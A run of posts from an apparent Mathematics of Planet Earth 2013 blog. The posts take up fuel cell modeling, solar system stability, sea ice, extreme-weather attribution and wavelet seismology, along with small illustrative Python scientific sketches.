    Electrons travel through an external circuit, doing useful work. The membrane is a key element of these devices. There are several types of fuel cells; the ones we looked at were low-temperature (80 degrees C) devices in which the membrane is a polymer material with acidic side chains. These are Polymer Electrolyte Membrane Fuel Cells (PEMFC). The electrochemical reactions on either side of the membrane have to be catalyzed to run at appreciable rates. Currently, platinum is used as the catalyst. This is one of the limitations to widespread use, since platinum is expensive and rare. Some more details of the processes in the Membrane Electrode Assembly (MEA) between the fuel cell channels are shown below.

    Fuel Cell - Membrane Electrode Assembly

    Much of what we did was modeling, that is, writing equations that described processes within a fuel cell and then thinking of ways to compute approximations to these models efficiently. These models were what is known as “multi-scale,” since details of processes from channel to channel (about 1 mm) affect performance along the length of the cell (up to 1 m long), and a number of cells (up to 100) are combined in a fuel cell stack to make appreciable power. Much of what we did is summarized in the review article “PEM Fuel Cell: A Mathematical Overview,” if you want to see the technical details.

    I found some pictures from our group from the early years (late 1990s). Shown below from left to right are me (looking young and using an overhead projector!), Keith Promislow, and Radu Bradean who worked with us as a post-doctoral fellow and then went to a position at Ballard. You can see we had fun with this project.

    Brian Wetton, Keith Promislow, Radu Bradean

    As mathematicians, we really brought something to this project and this industry. Standard engineering computational tools such as computational fluid dynamics packages are not a good fit to models from this industry due to their multi-scale nature, the stiff electrochemical reaction rates and the capillary dominated two phase flow in the electrodes.

    However, I have to say that I was initially reluctant to be involved in the project and viewed it as a distraction from my research work at the time on more abstract questions in scientific computation. In hindsight, I am happy I did get involved, but my initial reservation is common to many mathematicians. In my department (Mathematics at the University of British Columbia) I would say that only 10 of 60 faculty members would be open to an interdisciplinary project like the one I described above and this is a higher ratio than most departments. Concentrating on research in a single, technical, abstract area is seen as the best path to professional success. In some departments (not that uncommon) most of the work I did on this project would not count towards professional advancement (tenure and promotion), since it was not mathematics research but rather the use of “known” mathematics in a new application (known to us but not to the application scientists). I am not advocating that all mathematicians should work on such projects: it was the high-level mathematical training I received in a mathematics-focused environment that gave me the skills to contribute to this project. However, I believe such projects should be encouraged and rewarded. Events like MPE2013 highlight the contributions that mathematicians can make to our world, and I am very happy to be a part of it.

    Author Bio: Dr. Brian Wetton was trained at the Courant Institute of NYU. In 1991 he became a faculty member in the Mathematics Department at UBC. He was awarded the Canadian Applied and Industrial Mathematics Society prize for Industrial Mathematics research in 2010 for his work on this project.

    Posted in Energy, Mathematics | Leave a comment

    Improving Algorithms in Climate Codes

    Climate science relies on modeling and computational simulation. Improving the algorithms and codes related to climate modeling is an ongoing research effort. One such example can be found in a talk by Andrew Salinger at the recent SIAM Conference on CS&E, which highlighted one of these areas of research: improving solvers in climate codes. These solvers are used in ice sheet simulations, as well as in atmosphere, ocean, and tracer transport applications. For an audio recording of the talk, click here. The abstract for the talk can be found here.

    Posted in Climate Modeling, Mathematics | Leave a comment

    Why is celestial mechanics part of MPE2013?

    Since the beginning of MPE2013, I have met people who were surprised when I classified celestial mechanics as a topic that would fit under Mathematics of Planet Earth. But part of celestial mechanics is concerned with planetary motion, and Earth is a planet.

    The toy model for planetary motion is the n-body problem, which describes the motion of n massive particles subject to Newton’s gravitational law. The n-body problem is a purely mathematical problem. The model consists of a system of 3n second-order differential equations. Using the Hamiltonian formalism, one transforms the system into a system of first-order ordinary differential equations in dimension 6n.
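As a small illustration of that first-order formulation (my own sketch, with units chosen for convenience rather than anything used in the research described below), here is the n-body system written out in Python and integrated for a toy Sun-Earth pair.

    import numpy as np
    from scipy.integrate import solve_ivp

    # Units: lengths in AU, times in years, masses in solar masses, so G = 4*pi^2.
    G = 4 * np.pi**2
    masses = np.array([1.0, 3.0e-6])          # "Sun" and "Earth" (approximate)

    def nbody_rhs(t, y):
        """First-order system in the 6n variables (positions, then velocities)."""
        n = len(masses)
        pos = y[:3 * n].reshape(n, 3)
        vel = y[3 * n:].reshape(n, 3)
        acc = np.zeros_like(pos)
        for i in range(n):
            for j in range(n):
                if i != j:
                    r = pos[j] - pos[i]
                    acc[i] += G * masses[j] * r / np.linalg.norm(r)**3
        return np.concatenate([vel.ravel(), acc.ravel()])

    # Earth on a roughly circular orbit at 1 AU; the Sun starts at rest at the origin.
    y0 = np.array([0, 0, 0,  1, 0, 0,          # positions
                   0, 0, 0,  0, 2 * np.pi, 0]) # velocities
    sol = solve_ivp(nbody_rhs, (0, 1.0), y0, rtol=1e-9, atol=1e-9)
    # After one year the "Earth" should return close to its starting point (1, 0, 0).
    print("Earth after one year (AU):", sol.y[3:6, -1])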

    In the 19th century, mathematicians were looking for first integrals, i.e., quantities that remain constant along the trajectories of the system. Because we expect quasi-periodic solutions (i.e., superpositions of periodic solutions with different periods for the different planets), Weierstrass computed solutions in the form of Fourier series, but he could not show their convergence. The field of the n-body problem experienced its first revolution in 1885, when Poincaré showed that the system is not integrable and that there exist chaotic solutions for which Weierstrass’s series diverge. The second revolution came with KAM theory in the 1950s and ’60s, following earlier work by Carl Siegel. KAM stands for Kolmogorov, Arnold and Moser. Kolmogorov essentially conjectured the results in 1954, and they were later proved in the ’60s by Arnold in the analytic case and by Moser in the smooth case.

    KAM theory is concerned with systems that are close to an integrable system. The solar system is integrable if we neglect the mutual interactions among the planets. Then each planet has a periodic orbit around the Sun, and the system as a whole is quasi-periodic. Since the interaction between planets is small, we are relatively close to an integrable system. What happens then? It depends on the periods of the planets. If the periods of the planets are commensurable, the system comes back regularly to the same position and the perturbations add up. We call this the resonant case; the corresponding set of initial conditions has measure zero. If we are sufficiently close to the resonant case, we are again in the chaotic regime, and if we are far from the resonant case, we expect stability. Hence, phase space is intertwined: an open dense set of very small measure, consisting of initial conditions close to resonance, gives rise to chaotic motions, while a set of nearly full measure gives rise to stable quasi-periodic motions. To the famous question “Is the solar system stable?” we would have answered in the 1970s: “Yes, if we have the right initial conditions.”

    Now we know more. We know that the solar system is too far from an integrable system to enable us to apply KAM theory directly. But the spirit of KAM theory remains. We know that resonances are responsible for chaotic motions, and when we find some chaotic motions we look for the resonances that could have been responsible for them.

    Jacques Laskar made an extensive study of the solar system. In 1994 he gave numerical evidence that the inner planets (Mercury, Venus, Earth and Mars) have chaotic motions and identified the resonances responsible for their chaotic behavior. Because of the sensitivity to initial conditions, numerical errors grow exponentially, so it is impossible to control the positions of the planets over long periods of time (hundreds of millions of years). In his simulations, Laskar therefore used an averaged system of equations. The simulations showed that the orbit of Mercury could cross that of Venus for some period of time. Laskar could explain this chaotic behavior by exhibiting resonances in some periodic motions of the orbits of the inner planets.

    Another way to study chaotic systems is to run many simulations in parallel with close initial conditions and to derive probabilities of future behaviors. The shadowing lemma guarantees that a simulated trajectory resembles a real trajectory for a nearby initial condition. In a letter published in Nature [“Existence of collisional trajectories of Mercury, Mars and Venus with the Earth,” Nature 459, 817-819 (11 June 2009), doi:10.1038/nature08096], Laskar and M. Gastineau announced the results of an ambitious program of 2,000 parallel simulations of the solar system over periods of the order of 5 billion years. The new model of the solar system was much more sophisticated and included some relativistic effects. The simulations showed a 1% chance that Mercury could be destabilized and encounter a collision with the Sun or Venus. A much smaller number of simulations showed that all the inner planets could be destabilized, with a potential collision between the Earth and either Venus or Mars, in around 3.3 billion years.

    Christiane Rousseau

    Posted in Astrophysics, General, Mathematics | 2 Comments

    National Environmental Education Week, Green Ribbon Schools, and Earth Day

    This week (April 14-20) is National Environmental Education Week. Secretary of Education Arne Duncan talks about the importance of linking STEM education with environmental education as a way to prepare students for the 21st century.

    Monday April 22 is Earth Day! On that day, the U.S. Department of Education will announce the winners of the second annual Green Ribbon School awards. These awards are given to schools that are exemplary in reducing environmental impact and costs; improving the health and wellness of students and staff; and providing effective environmental and sustainability education, which incorporates STEM, civic skills and green career pathways.

    The Sustainability Counts! section of the Mathematics Awareness Month website provides a number of model lessons that demonstrate how one can incorporate mathematics into sustainability education. With the growing interest at the K-12 level in teaching about sustainability, there is a growing market for high quality materials that link mathematics to sustainability. Mathematicians in the MPE2013 network are encouraged to develop such materials as a component of their work.

    At Bryn Mawr College, we will be celebrating Earth Day tomorrow, Saturday, April 20. There will be a wide range of activities around the environment that student groups have organized. I will be contributing an activity called “When will all the ice be gone?” based on a math unit that looks at the extent of sea ice in the Arctic. The challenge is to use the data on sea-ice extent over the past decade to predict in which year the Arctic will first become completely free of ice. I will be offering a $50 prize to the winner. The catch is that they may have to wait a while to claim their prize. Take a look at the beautiful and thought-provoking video A New Climate State: Arctic Sea Ice 2012 to learn more about the Arctic sea ice melt.
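For teachers who want a starting point, here is a bare-bones Python version of the exercise; the extent values below are placeholders to make the script run, and students would substitute the observed September values from the NSIDC.

    import numpy as np

    # Placeholder September sea-ice extents (million km^2), one value per year.
    years = np.arange(2003, 2013)
    extent = np.array([6.1, 6.0, 5.6, 5.9, 4.3, 4.7, 5.4, 4.9, 4.6, 3.6])

    # Fit a straight line and extrapolate to the year where the fit reaches zero.
    slope, intercept = np.polyfit(years, extent, 1)
    ice_free_year = -intercept / slope
    print(f"linear trend: {slope:.3f} million km^2 per year")
    print(f"extrapolated ice-free year: {ice_free_year:.0f}")

Of course, a straight line is only the crudest possible model; part of the fun of the activity is debating whether the decline is better described by some other curve.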

    On Friday, I will be attending the Earth Day celebration at Abraham Lincoln High School in Philadelphia, which will include the kick-off for their “Renewable Energy and Energy Conservation” mural, which they will paint over the next two years. I look forward to celebrating the excellent work of the students and their teachers, and to awarding the school copies of our Mathematics of Sustainability poster.

    Victor Donnay
    Chair, Mathematics Awareness Month Advisory Committee
    Professor of Mathematics
    Bryn Mawr College

    Posted in General, Sustainable Development | Leave a comment


    Raspberry Fields Forever

    Today is my father’s birthday. If he were alive he would be 110 years old! My father, Steve Basor, was born to immigrant parents in Lead, South Dakota, in 1903 but left there when he was very small with his parents who returned to live in the tiny village of Dunave, Croatia (then part of the Austrian empire). He went to the local village school, helped with the family farm, and then after living in Argentina for five years, returned to the United States in 1931. He settled in Watsonville, California, and farmed in the Pajaro Valley, close to the Monterey Bay. Watsonville had a large population of Croatians, most from the Konavle Valley, and almost all were involved in farming. My father was an apple grower, as were many of his friends and relatives. It was from him that I got my love of farming and also my love of mathematics. He knew many math facts, games, and puzzles that he taught to me when I was young. The following tells how the two interests combined.

    The Pajaro Valley is ideally suited for agriculture. When my father farmed one could see acres and acres of fruit trees, but these were slowly replaced by crops of vegetables, berries, and flowers. In fact, the Pajaro Valley and the nearby Salinas Valley produce nearly half of the 2 billion pounds of strawberries grown in the United States annually. The water source for the valley is a confined underground aquifer, which is slowly being depleted. Estimates for the overdraft vary, but the amount of water being used each year is between 125% and 150% of the sustainable yield. The overdraft creates a problem of salt water intrusion along the coast, making many coastal wells unusable, and lowers the water table over the entire valley.

    In January of 2011, AIM held a Sustainability Problems workshop, with the goal of bringing together mathematicians and industry representatives to work on a variety of sustainability problems, including renewable energy, air quality, water management, and other environmental issues. It seemed to me that it might be possible to get berry growers to team with the mathematicians to help with the overdraft problem. I still have farming ties in the valley and asked Driscoll’s, whose associated growers are the largest supplier of fresh berries in North America, whether they were interested. To my delight, the Driscoll’s representatives agreed to come to the workshop.

    So three Driscoll’s employees teamed up with nine applied mathematicians to evaluate how various water and land management techniques could be utilized by landowners and growers to work towards balancing aquifer levels. During the week of the workshop, and with follow-up activity in an AIM SQuaRE program, the team has made significant progress in the creation of a virtual farm model to study alternative crop management strategies and their effect on water usage and profit. The model uses an optimization framework (with over 200 constraints) to maximize profit while meeting a water budget constraint. According to Dan Balbas, Vice President for Operations for Reiter Affiliated Companies (a Driscoll’s associated grower), “the results of the optimization program validated much of what the growers thought before and gave validation and new information to our crop growing strategies.” The team also investigated a surface water analysis to understand feasible ways to capture rainfall for reinfiltration (or recharging) into the aquifer.

    Driscoll’s has also spearheaded a community effort to help solve the overdraft problem. Pajaro Valley community members are working in smaller groups on a number of additional strategies, including the determination and promotion of best practices for irrigation and the identification of the most promising areas in the valley for aquifer recharge projects (a fluid flow problem!). The community effort to solve the water problem is a remarkable model for bringing together groups with very different goals and experiences and finding common ground.

    I am pleased to report that the SQuaRE group is back at AIM this week and should have a future report very soon about progress, including the recharge efforts.

    Estelle Basor
    AIM

    Posted in Mathematics, Resource Management, Sustainable Development | 2 Comments

    Math-to-Bio? Yes, but also Bio-to-Math!

    As can be seen from numerous entries in this blog, mathematics, statistics, and the computational sciences are having impact and influence on a wide array of disciplines that fall under the umbrella of Mathematics of Planet Earth. In fact, in his book “The Mathematics of Life,” Ian Stewart cites the following five revolutions in biology:

    – the invention of the microscope,
    – the systematic classification of the planet’s living creatures,
    – the theory of evolution,
    – the discovery of the gene, and
    – the discovery of the structure of DNA.

    He then expresses the idea that a sixth is on its way: the application of mathematical insight to biological processes. (For a review of the book by John Adam in the AMS Notices, click here.)

    However, another exciting aspect of the relationship between mathematics and biology is the potential — the expectation even — that biology will provide the impetus for new mathematics, and that the feedback loop between mathematics and biology will be at least as influential and exciting as the one mathematics and physics have enjoyed for over 2000 years.

    An excellent place to get a feel for this growing relationship is in Joel Cohen’s essay “Mathematics Is Biology’s Next Microscope, Only Better; Biology Is Mathematics’ Next Physics, Only Better”.

    In a related vein, NSF’s Mathematical Biosciences Institute (MBI) hosted the meeting “Math Biology: Looking at the Future” in September 2012. At this meeting, 11 distinguished speakers talked about areas at the interface of mathematics and biology where exciting progress has been made in recent years and where future advances can be expected. Titles and abstracts — and full lecture video for most of the talks — can be found here.

    Whether it’s Math-to-Bio, Bio-to-Math, or both, it’s an exciting time to be exploring and expanding the interface.

    Tony Nance
    MBI

    Posted in Biology, General, Mathematics | Leave a comment

    Arctic Sea Ice and Cold Weather

    Could the cold weather experienced this winter in the northern part of the Eurasian continent be related to the decrease in Arctic sea ice? This question is the subject of much debate in the media in Europe. This post shows some relevant weather maps and links to several relevant blogs and articles.

    Temperature distribution

    First, what does the unusual temperature distribution observed this March actually look like? Here is a map showing the data (up to and including March 25, NCEP / NCAR data plotted with KNMI Climate Explorer):

    Mean Temperature at 2m, March 2013

    Freezing cold in Siberia, reaching across northwestern Europe, unusually mild temperatures over the Labrador Sea and parts of Greenland and a cold band diagonally across North America, from Alaska to Florida. Averaged over the northern hemisphere the anomaly disappears – the average is close to the long-term average. Of course, the distribution of hot and cold is related to atmospheric circulation, and thus the air pressure distribution. The air pressure anomaly looks like this:

    Mean SLP, March 2013

    There was unusually high air pressure between Scandinavia and Greenland. Since circulation around a high (an anticyclone) is clockwise in the Northern Hemisphere, this explains the influx of cold Arctic air into Europe and the warmth over the Labrador Sea.

    Arctic sea ice

    Let us now discuss the Arctic sea ice. The summer minimum in September set a new record low, but also at the recent winter maximum there was unusually little ice (the sixth-lowest extent on record; the ten years with the lowest ice extent all fall within the last decade). The ice cover in the Barents Sea was particularly low this winter. All in all, as of March the deficit relative to the long-term average was about the size of Germany.

    Is there a connection with the winter weather? Does the shrinking ice cover influence the atmospheric circulation, because the open ocean strongly heats the Arctic atmosphere from below? (The water is much warmer than the overlying cold polar air.) Did the resulting evaporation of sea water moisten the air and thus lead to more snow?

    Here are links to some blogs where this problem is discussed: Neven Blog, Rabett Blog, SciLogs.

    Here are three references taken from Rabett Blog:

    Jaiser R, Dethloff K, Handorf D, Rinke A, Cohen J (2012) Impact of sea ice cover changes on the Northern Hemisphere winter atmospheric circulation. Tellus Series A-Dynamic Meteorology and Oceanography 64, doi: 10.3402/tellusa.v64i0.11595

    Liu JP, Curry JA, Wang HJ, Song MR, Horton RM (2012) Impact of declining Arctic sea ice on winter snowfall. Proceedings of the National Academy of Sciences of the United States of America 109 (11) :4074-4079, doi: 10.1073/pnas.1114910109

    Petoukhov V, Semenov VA (2010) A link between reduced Barents-Kara sea ice and cold winter extremes over northern continents. Journal of Geophysical Research-Atmospheres 115, D21111, doi: 10.1029/2009jd013568 (Abstract is free; article is behind a pay wall.)

    Posted in Cryosphere, General, Weather | Leave a comment

    Extreme Weather Event

    Tuesday April 9, 2013

    (High of 65 — felt like 72 or so — and winds at 25mph, gusting
    to 33mph. Record high for Worcester on April 9 is 77.)

    It was unusually warm and windy for early April. We piled into the toasty lecture hall with drinks and sandwich wraps in hand. Dr. Smith, with his shock of white hair and the thin frame of a marathon runner, shed his sport jacket as he recounted the 2003 European heat wave, which some claim caused up to 70,000 deaths; the 2010 Russian heat wave; the floods in Pakistan that same year; and the devastation of Hurricane Sandy last year.

    Trained as a probabilist and currently the Director of SAMSI and a professor of Statistics at UNC Chapel Hill, Richard Smith guided the audience through the challenges of doing reliable science in the study of climate change. Rather than address the popular question of whether recent climate anomalies fall outside the statistical norm of recent millennia (other research strongly suggests they do), Dr. Smith asked how much of the damage is attributable to human behaviors such as the emission of greenhouse gases from the burning of fossil fuels.

    Demonstrating a deep familiarity with the global debate on climate change and the reports of the IPCC (Intergovernmental Panel on Climate Change), Professor Smith discussed the statistical parameter “fraction of attributable risk” (FAR), which is designed to compare the likelihood of some extreme weather event (such as a repeat of the European heat wave) under a model that includes anthropogenic effects versus the same value ignoring human factors.

    Employing the rather flexible Generalized Extreme Value (GEV) distribution and Bayesian hierarchical modeling, Dr. Smith walked the audience of 40+ through an analysis of the sample events mentioned above, giving statistically sound estimates of how likely an event is to occur with anthropogenic effects versus without them. Smith explained how a strong training in statistics guides one to the GEV distribution as a natural model for such events; this distribution involves a shape parameter xi that captures the length of the tail of the observed distribution.
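For readers who want to see the mechanics, here is a heavily simplified Python sketch of a FAR-style calculation (FAR = 1 - P0/P1, where P0 and P1 are the probabilities of exceeding a threshold without and with anthropogenic influence). It is not Dr. Smith’s Bayesian hierarchical analysis; it simply fits a GEV to two synthetic, placeholder samples of annual maxima and compares tail probabilities.

    import numpy as np
    from scipy.stats import genextreme

    rng = np.random.default_rng(1)
    # Synthetic annual-maximum temperatures (deg C): "natural" vs. "anthropogenic" runs.
    nat = rng.gumbel(loc=36.0, scale=1.2, size=200)
    ant = rng.gumbel(loc=37.0, scale=1.3, size=200)

    threshold = 40.0  # an assumed "extreme event" threshold, e.g. a heat-wave benchmark

    def exceedance_prob(sample, x):
        # Note: scipy's shape parameter c equals minus the usual GEV shape xi.
        c, loc, scale = genextreme.fit(sample)
        return genextreme.sf(x, c, loc=loc, scale=scale)

    p0 = exceedance_prob(nat, threshold)   # probability without human influence
    p1 = exceedance_prob(ant, threshold)   # probability with human influence
    far = 1.0 - p0 / p1
    print(f"P(natural) = {p0:.4f}, P(anthropogenic) = {p1:.4f}, FAR = {far:.2f}")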

    Perhaps the most compelling graphs were plots of the estimated changes in predicted extreme weather events over time. One such plot is included below, giving the probability of a repeat of an event in Europe similar to the 2003 heat wave, with posterior median and quartiles marked in bold and a substantial confidence interval shaded on the plot.

    Europe Probability vs. Year

    One intriguing aspect of this cleverly designed talk was a digression about computational climate models. The NCAR-Wyoming Supercomputing Center in Cheyenne houses the famed “Yellowstone” machine, with its 1.5-petaflop capability and 144.6-terabyte storage farm, which will cut down the time for climate calculations and provide much more detailed models (reducing the basic spatial unit from 60 square miles down to a mere 7). Dr. Smith explained the challenge of obtaining and leveraging big data sets and amassing as many reliable runs of such climate simulations as possible to improve the reliability of the corresponding risk estimates. The diverse audience encountered a broad range of tools and issues that come into play in the science of climate modeling, and we all had a lot to chew on as a result of this talk.

    A lively question and answer period ensued with questions about methodology, policy, volcanoes versus vehicles, and where to go from here to make a difference. Then we all poured out into the heat of an extremely warm April afternoon, pondering whether this odd heat and wind was normal for a spring day in Massachusetts.

    Dr. William J Martin,
    Professor, Mathematical Sciences and Computer Science
    WPI

    Posted in Climate, General, Statistics, Weather | Leave a comment

    The Interplay Between Mathematical Models, Massive Data Sets, and Climate Science

    Mathematical modeling and data analysis play a critical role in the mathematics of Planet Earth. This theme was brought home in a panel discussion “Big Data Meets Big Models,” particularly in the presentation by Anna Michalak.

    The public is generally aware of how models are used for weather prediction, but perhaps less aware of how modeling and the ability to process and analyze large data sets play a critical role in climate science. Mathematical models are necessary to understand the many aspects of climate science and underlie our ability to predict future changes. One example lies in the complex interplay of carbon – its transition from sources (like the burning of fossil fuels) through the ocean, air, land, and biosphere.

    A critical component to understanding the role of carbon dioxide (CO2) in global warming is this global carbon cycle – the transmission of carbon through ocean, atmosphere, and land. Human activities produce several gigatons of carbon per year; some fraction of this is absorbed by plants, oceans, and other mechanisms. Having a better quantitative understanding of the natural carbon sinks is essential for better predictions of the future. This leads to a need for better measurements of the carbon cycle to ensure that we have good data upon which to base our models. And there is also a need for improved monitoring as states may agree to limit carbon emissions.

    This has led to a major infrastructure project to gather data from observations. FluxNet, a “network of regional networks,” coordinates regional and global analysis of observations from micro-meteorological tower sites. The flux tower sites use eddy covariance methods to measure the exchanges of carbon dioxide, water vapor, and energy between terrestrial ecosystems and the atmosphere.
    The idea is to gather massive amounts of data on CO2, along with data on rainfall and fires, to better calibrate carbon transmission. The various sites around the world will gather vast amounts of data. Since we often cannot measure the quantities we want directly, but only related variables, improved mathematical models are needed to make sense of the data being collected. Mathematical models will also be required to fill in the gaps (since data are available only at spatially dispersed sites, for example) – an example of the interplay between mathematical models, massive data sets, and climate science.
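
    For readers curious what an eddy covariance calculation looks like in practice, here is a minimal sketch (with synthetic numbers, not FluxNet data): the vertical turbulent flux is estimated as the covariance between the fluctuations of the vertical wind speed w and of the CO2 concentration c, both measured at high frequency on the tower.

        import numpy as np

        rng = np.random.default_rng(0)
        n = 18000                                    # e.g., 30 minutes of 10 Hz measurements
        w = 0.3 * rng.standard_normal(n)             # vertical wind speed (m/s), synthetic
        c = 400.0 + 5.0 * rng.standard_normal(n)     # CO2 concentration, illustrative units
        c -= 0.5 * w                                 # impose a small downward flux for the example

        # eddy covariance: mean product of the fluctuations about the averaging-period means
        w_prime = w - w.mean()
        c_prime = c - c.mean()
        flux = np.mean(w_prime * c_prime)            # negative here: net uptake by the surface
        print(f"estimated flux: {flux:.3f}")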

    Posted in Carbon Cycle, Climate Modeling | Leave a comment

    Mathematicians listen as the Earth rumbles…

    “Mathematicians listen as the Earth rumbles… ” This was the title of the fourth MPE Simons Lecture, given by Ingrid Daubechies in Montreal, Canada, on April 10. Her splendid lecture was delivered in French, but both English and French videos of the lecture will soon be available on the Simons website.

    Too often, we limit Mathematics of Planet Earth to climate change and sustainability problems. This lecture, by contrast, fit squarely under the first theme of MPE, namely “a planet to discover.” Ingrid Daubechies spoke about her own work with geophysicists and about very recent results on the problem of understanding the formation of volcanic islands.

    The rocks of the ocean floor are much younger than those of the continents. On the ocean floor, the youngest rocks lie along the ridges where tectonic plates diverge. And indeed, there is volcanic activity along these ridges, with new rocks being formed by magma rising from the mantle to the surface. But there are also isolated volcanic islands, like Hawaii, Tahiti, the Azores, and Cape Verde. In the Hawaiian archipelago, the islands are aligned, and their age increases from the largest island at one end to the smaller islands at the other. This has suggested to geophysicists that the islands were formed by a plume, i.e., a kind of volcanic chimney through the mantle. Recall that the mantle extends to a depth of about half the radius of the Earth. Since the surface plate is moving, a plume could explain the successive formation of the aligned islands, with the differences in age consistent with the distances between the islands and the speed of the tectonic plate.

    But additional evidence is needed for the conjecture to be accepted by the scientific community. For instance, one would like to “see” the plume. One tool for exploring the interior structure of the Earth is remote sensing: one sends waves (signals) and analyzes the signals reflected by the boundary of some layer or refracted inside different layers. But plumes are located so deep under the Earth’s crust that the usual signals are not powerful enough to be of any help. The only waves that carry sufficient energy to analyze details at such a depth are the seismic waves generated by large earthquakes.

    Large databases exist which contain the recordings of these seismic waves by seismic stations around the world. So the data exist. We then need an appropriate tool to analyze them. The problem is not trivial: plumes are very thin regions, and the change in the speed of a seismic wave passing through a plume is only on the order of 1%.

    In 2005, seismologists Tony Dahlen and Guust Nolet approached Ingrid Daubechies to see if wavelets could help in their venture. Indeed, the promising results of their student Raffaella Montelli had shown that seismic methods could be used to capture regions of perturbations of the pressure waves (P-waves) of earthquakes; see the figure below.
    [Figure: P-wave velocity perturbations]
    Such regions overlapped exactly with the regions of isolated volcanic islands: the temperature of the ocean floor was higher there. But, as mentioned above, plumes are very thin, and the difference in speed of seismic P-waves in these regions is very small. Hence, there is a large risk of errors in the numerical reconstruction of the inner structure of the Earth, unless an appropriate tool is used. This is where wavelets proved useful: they are the perfect tool for analyzing small localized details. Moreover, one can concentrate the analysis on small regions and neglect the other regions.

    In her lecture, Ingrid Daubechies gave a short course on wavelets adapted to digital images made of pixels. A gray-tone image is just an array of numbers giving the gray tone of each pixel. From this matrix, one constructs four smaller matrices consisting of either horizontal or vertical averages of neighboring pixels taken 2 by 2, or horizontal or vertical differences of neighboring pixels taken 2 by 2. One can then iterate the process on the matrix of averages. She explained how wavelets allow information to be compressed and how very fine details can be extracted in a local region while keeping the size of the data manageable. Using wavelets to construct the images helps remove spurious artifacts in the numerical reconstructions and makes sure that the special zones identified in the image are indeed special. She showed clean images produced with wavelets in which artificial special regions had been removed, and she could announce “hot off the press” that she and her collaborators had obtained the first results for the whole Earth, with real data!
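
    For readers who want to experiment, here is a minimal sketch (in Python, not from the lecture) of one level of the averaging-and-differencing step described above, i.e., a 2-D Haar wavelet transform:

        import numpy as np

        def haar_level(img):
            # One level of the 2-D Haar transform: split an image (even dimensions)
            # into four half-size sub-images of 2x2 block averages and differences.
            a = img[0::2, 0::2]   # top-left pixel of each 2x2 block
            b = img[0::2, 1::2]   # top-right
            c = img[1::2, 0::2]   # bottom-left
            d = img[1::2, 1::2]   # bottom-right
            ll = (a + b + c + d) / 4.0   # averages (coarse image)
            lh = (a - b + c - d) / 4.0   # horizontal differences
            hl = (a + b - c - d) / 4.0   # vertical differences
            hh = (a - b - c + d) / 4.0   # diagonal differences
            return ll, lh, hl, hh

        # Iterating on the average sub-image gives a multiresolution decomposition:
        img = np.random.rand(256, 256)
        ll, lh, hl, hh = haar_level(img)
        ll2, _, _, _ = haar_level(ll)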

    Christiane Rousseau

    A report on Dr. Daubechies’ lecture.

    Posted in General, Geophysics, Imaging, Mathematics | Leave a comment

    Next Generation Science Standards

    The Next Generation Science Standards have just been released. These standards recommend the teaching of science via hands-on approaches, with a focus on the scientific process rather than memorizing factoids. They propose that climate change be an integral part of science education starting in middle school. One can imagine great synergistic opportunities between the mathematics of sustainability and these new science standards. Here is an article from The New York Times discussing the new standards. Print versions of the report can be ordered here.

    Posted in General | 1 Comment

    “Great Scientist > Good at Math”

    Last Friday, the Wall Street Journal (WSJ) published an essay by E.O. Wilson that has since generated much discussion from readers (229 comments to date) on the WSJ website and also among mathematicians. The most provocative part of the article is the headline, “Great Scientist ≠ Good at Math.” (As observed by Barry Cipra, the inequality ≠ is arguably correct, but it should really be written more strongly as “Great Scientist > Good at Math,” as in “to be a great scientist, you need to be more than good at math.”) The essay itself is less provocative than the headline, and one of the points that Wilson is trying to make is that students who are not especially good at mathematics but are passionate about science may turn away from serious work in the sciences. He himself had little training in formal mathematics but worked with many mathematicians.

    Here are a couple of interesting quotes:

    “Many of the most successful scientists in the world today are mathematically no more than semiliterate.”

    “Over the years, I have co-written many papers with mathematicians and statisticians, so I can offer the following principle with confidence. Call it Wilson’s Principle No. 1: It is far easier for scientists to acquire needed collaboration from mathematicians and statisticians than it is for mathematicians and statisticians to find scientists able to make use of their equations.”

    “Newton invented calculus in order to give substance to his imagination. Darwin had little or no mathematical ability, but with the masses of information he had accumulated, he was able to conceive a process to which mathematics was later applied.”

    I was struck by these comments in light of our MPE2013 efforts. After all, one of our primary purposes is to showcase the necessity of using sophisticated mathematics to solve hard problems. We know (although I am most likely preaching to the choir) that mathematical techniques are vital in understanding things like genomic analysis, image processing, and other problems in biology. Surely, Wilson must be aware of these developments.

    Recently, at the AIM workshop “Mathematical problems arising from biochemical reaction networks,” mathematicians as well as researchers who are closer to the experimental side of systems biology came together to tackle the analysis of biochemical reaction networks arising in systems biology. This workshop was really a counterexample to the above Wilson Principle No. 1.

    One of the workshop organizers, Jeremy Gunawardena, gave a wonderful talk about present and past work, with the mantra that “Biology is more theoretical than physics.” The idea was that mathematical analysis of biochemical networks may be feasible, using methods from computational algebra, algebraic geometry and dynamical systems, and that mathematical methods may be the only way to understand these highly complicated systems.

    Another common point made in the comments is that Wilson may be using a narrow view of what mathematics is. His view seems to be that mathematics is calculus and differential equations. Many of the elements that he thinks are important for scientific research – being a good observer, creativity, concept formulation – are, we think, also important elements of mathematics research.

    I am sure one can point to many examples where Wilson’s principle fails to hold, but if there is a lesson from the Wilson article, it is that there is much work to do to make the message of MPE2013 heard, not just to the general public but to scientists as well.

    Here are links to interesting comments by Paul Krugman (NYT, April 9, 2013) and Edward Frenkel (Slate, April 9, 2013).

    Estelle Basor
    AIM

    Posted in Biology, General, Mathematics | 1 Comment

    Mathematics of Tipping Points

    A lake that used to be clear, with a rich vegetation and a diverse aquatic life, suddenly becomes turbid, with much less vegetation and only bottom dwelling fish remaining. It turns out that the change comes from increased nutrient loading, but when the runoff leading to the nutrient inflow is reduced, the lake doesn’t become clear again – it remains murky.

    A dry land area with patchy vegetation becomes completely barren after an especially dry season, but when normal rain patterns return, it remains a desert.

    An entire planet that used to have varied climate zones, ranging from tropical areas to icecaps near the poles, freezes over completely, perhaps due to variations in the solar energy output, with all oceans frozen except near some thermal vents and all continents covered by thick ice sheets. When the solar output increases again, the planet remains in its frozen state.

    These are examples of transitions of ecological systems past “tipping points” – the subject of a fascinating talk given by Mary Lou Zeeman on March 28 of this year in the Carriage House lecture hall of the Mathematical Association of America (MAA) in Washington, DC. Mary Lou, one of six children of the well known British mathematician Sir Christopher Zeeman, is a professor of mathematics at Bowdoin College and works on dynamical systems, with applications in ecology and biology. The Carriage House auditorium was full when she gave her talk. The audience included students, residents of the Washington area who are interested in science, and local mathematicians – just the ecological mix that the MAA lecture series tries to achieve.

